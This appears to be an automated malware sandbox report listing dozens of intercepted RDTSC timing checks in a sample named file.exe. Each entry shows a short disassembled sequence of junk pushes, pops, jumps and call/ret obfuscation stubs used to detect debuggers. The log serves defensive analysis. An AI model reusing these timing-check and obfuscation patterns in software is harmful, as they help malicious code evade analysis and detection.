              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A6F0D second address: 13A6F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F437936CE2Ch 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8382 second address: 13A8393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F4379371466h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8456 second address: 13A845C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A845C second address: 13A846F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F437937146Ch 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A846F second address: 13A84AE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F437936CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 jbe 00007F437936CE28h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F437936CE32h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007F437936CE2Ch 0x0000002c jng 00007F437936CE26h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C94 second address: 13A8CBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4379371477h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jne 00007F4379371466h 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9619 second address: 13A961D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A961D second address: 13A9639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F437937146Ch 0x00000016 jc 00007F4379371466h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9639 second address: 13A9644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F437936CE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9726 second address: 13A9736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F4379371466h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97BA second address: 13A97BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97BE second address: 13A97C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97C4 second address: 13A97CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97CA second address: 13A97CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9CCF second address: 13A9CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9CD3 second address: 13A9D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4379371468h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 mov di, 219Dh 0x0000002b xchg eax, ebx 0x0000002c je 00007F4379371474h 0x00000032 push eax 0x00000033 push edx 0x00000034 je 00007F4379371466h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9D16 second address: 13A9D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9D23 second address: 13A9D29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AA557 second address: 13AA56D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB050 second address: 13AB054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB054 second address: 13AB05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC320 second address: 13AC325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB05A second address: 13AB064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F437936CE26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC325 second address: 13AC34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4379371466h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4379371474h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACEAC second address: 13ACEB1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACC5B second address: 13ACC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACC61 second address: 13ACC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACF4D second address: 13ACF5A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4379371466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ACF5A second address: 13ACF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ecx 0x0000000a jl 00007F437936CE2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE36C second address: 13AE372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE372 second address: 13AE385 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F437936CE28h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AEC3D second address: 13AEC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6417 second address: 13B6428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6428 second address: 13B642E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B642E second address: 13B6432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B54A1 second address: 13B54B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F437937146Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B73E7 second address: 13B73F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B6578 second address: 13B6582 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F437937146Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B849E second address: 13B84A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B84A2 second address: 13B84A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B84A8 second address: 13B8507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F437936CE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F437936CE28h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 cld 0x00000029 push 00000000h 0x0000002b sub edi, 5E20CDBDh 0x00000031 xchg eax, esi 0x00000032 jmp 00007F437936CE30h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8507 second address: 13B850B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B850B second address: 13B8511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B966A second address: 13B967C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F437937146Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B967C second address: 13B969B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F437936CE32h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB256 second address: 13BB260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4379371466h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B969B second address: 13B96A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F437936CE26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB260 second address: 13BB283 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4379371466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4379371474h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB283 second address: 13BB288 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB288 second address: 13BB2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov ebx, 33D68FA7h 0x0000000d jmp 00007F437937146Ch 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F4379371468h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D1B82h] 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE1C5 second address: 13BE1CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BC4F2 second address: 13BC4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD41B second address: 13BD41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB44D second address: 13BB457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4379371466h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE3A7 second address: 13BE3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F437936CE26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BC5AB second address: 13BC5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB507 second address: 13BB514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE4E2 second address: 13BE4E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB514 second address: 13BB51E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F437936CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0325 second address: 13C0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29E0 second address: 13C29F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4379442F58h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jne 00007F4379442F56h 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C04CF second address: 13C04D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4378D2BA26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29F7 second address: 13C29FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29FD second address: 13C2A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c add dword ptr [ebp+122D2F6Fh], edi 0x00000012 jmp 00007F4378D2BA2Ch 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F4378D2BA28h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 xor dword ptr [ebp+122D1B3Ch], edi 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F4378D2BA28h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 jmp 00007F4378D2BA2Ah 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2A81 second address: 13C2AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2C16 second address: 13C2C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2C1A second address: 13C2C30 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4379442F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4379442F58h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2C30 second address: 13C2CBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4378D2BA2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F4378D2BA28h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F4378D2BA28h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2EFDh], ecx 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 clc 0x00000054 mov eax, dword ptr [ebp+122D1625h] 0x0000005a mov ebx, dword ptr [ebp+122D1BF3h] 0x00000060 push FFFFFFFFh 0x00000062 or bh, 00000052h 0x00000065 push eax 0x00000066 mov dword ptr [ebp+122D3002h], edx 0x0000006c pop ebx 0x0000006d nop 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F4378D2BA2Ah 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2CBC second address: 13C2CC6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4379442F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CAB4D second address: 13CAB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4378D2BA35h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDE0E second address: 13CDE14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDE14 second address: 13CDE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4378D2BA37h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDE34 second address: 13CDE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0291 second address: 13D02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4378D2BA2Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F4378D2BA2Ch 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 jl 00007F4378D2BA2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D02BF second address: 13D02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007F4379442F56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D02D2 second address: 13D02DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6BEF second address: 13D6C09 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4379442F5Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F4379442F56h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D59F4 second address: 13D5A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378D2BA35h 0x00000009 jl 00007F4378D2BA26h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F4378D2BA2Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6141 second address: 13D6162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6162 second address: 13D6176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4378D2BA26h 0x0000000e jc 00007F4378D2BA26h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62AC second address: 13D62B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4379442F56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62B6 second address: 13D62BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D62BA second address: 13D62EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4379442F67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4379442F60h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D63F1 second address: 13D63F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D63F5 second address: 13D63FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D63FD second address: 13D6403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D6403 second address: 13D641B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4379442F64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D641B second address: 13D642E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
